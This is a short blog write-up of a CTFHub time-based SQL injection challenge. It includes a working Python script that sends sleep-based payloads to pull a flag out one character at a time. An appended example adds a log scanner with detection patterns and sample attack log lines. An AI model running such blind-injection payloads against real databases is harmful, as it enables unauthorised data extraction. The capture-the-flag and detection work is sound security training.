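Time-based injection on CTFHub

CTFHub is a good place for beginners to get started.
Once you know the earlier injection types, time-based injection is still quite simple. When I have time I'll properly add binary search and make this more rigorous.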

import requests
import time

# Challenge instance; the payload is appended to the id parameter
url = "http://challenge-8a39656f3810752a.sandbox.ctfhub.com:10080/?id="
result = ""
for i in range(1,50):
	#print("[%d]" %(i) )
	for j in range(32,127):
		# Earlier payloads, kept for reference
		#payload = "if(ascii(substr(database(),1,1))>1,sleep(1.5),1)"
		#payload =  "if(ascii(substr(database(),%d,1))=%d,sleep(1),1)" %(i,j )
		payload = "if(ascii(substr((select flag from flag),%d,1))=%d,sleep(1),1)" %(i,j )
		
		# Time the request: a response slower than 1 second means the guess matched
		start = time.time()
		r = requests.get( url+payload ,timeout=5)
		end_time = time.time()
		
		#print(r.status_code)
		if end_time - start > 1 :
			#print(end_time - start)
			result += chr(j)
			print(result)
			break
	else:
		# No printable character matched at this position: end of the string
		break
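
An added example, not part of the original post: what the requests generated by the script above look like from the server side, and a log scan that picks them out by payload shape plus response time. The log format, the sample lines and the `detect` function are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in a hypothetical format:
#   client "GET target HTTP/x" status response_seconds
SAMPLE_LOG = """\
10.0.0.7 "GET /?id=1 HTTP/1.1" 200 0.012
10.0.0.9 "GET /?id=if(ascii(substr((select%20flag%20from%20flag),1,1))=98,sleep(1),1) HTTP/1.1" 200 0.015
10.0.0.9 "GET /?id=if(ascii(substr((select%20flag%20from%20flag),1,1))=99,sleep(1),1) HTTP/1.1" 200 1.013
10.0.0.9 "GET /?id=if(ascii(substr((select%20flag%20from%20flag),2,1))=116,sleep(1),1) HTTP/1.1" 200 1.011
10.0.0.8 "GET /?id=2&note=sleep%20well HTTP/1.1" 200 0.010
"""

LINE = re.compile(r'^(\S+) "GET (\S+) HTTP/[\d.]+" (\d{3}) ([\d.]+)$')
# A delay primitive called as a function (plain words like "sleep well" do not match).
DELAY = re.compile(r"\b(?:sleep|benchmark|pg_sleep)\s*\(", re.I)
# One character of a value being converted to a number for comparison.
PROBE = re.compile(r"\b(?:ascii|ord)\s*\(\s*(?:substr|substring|mid)\s*\(", re.I)
# Offset argument of a one-character substr(..., N, 1).
OFFSET = re.compile(r",\s*(\d+)\s*,\s*1\s*\)")


def detect(log_text, delay_floor=1.0):
    """Per client: probe count, probes answered slowly, character offsets walked."""
    hits = defaultdict(lambda: {"probes": 0, "delayed": 0, "positions": set()})
    for line in log_text.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue
        client, target, _status, secs = m.groups()
        # parse_qsl percent-decodes, so %20 and similar encodings do not hide the payload.
        for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            if not (DELAY.search(value) and PROBE.search(value)):
                continue
            entry = hits[client]
            entry["probes"] += 1
            entry["positions"].update(int(n) for n in OFFSET.findall(value))
            if float(secs) >= delay_floor:
                entry["delayed"] += 1
    return dict(hits)


if __name__ == "__main__":
    for client, info in detect(SAMPLE_LOG).items():
        print(client, info)
```

A nonzero `delayed` count means the database actually executed the injected `sleep`, so the parameter is injectable and the query behind it should be moved to a parameterized statement.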

posted @ 2020-05-09 23:38  何止(h3zh1)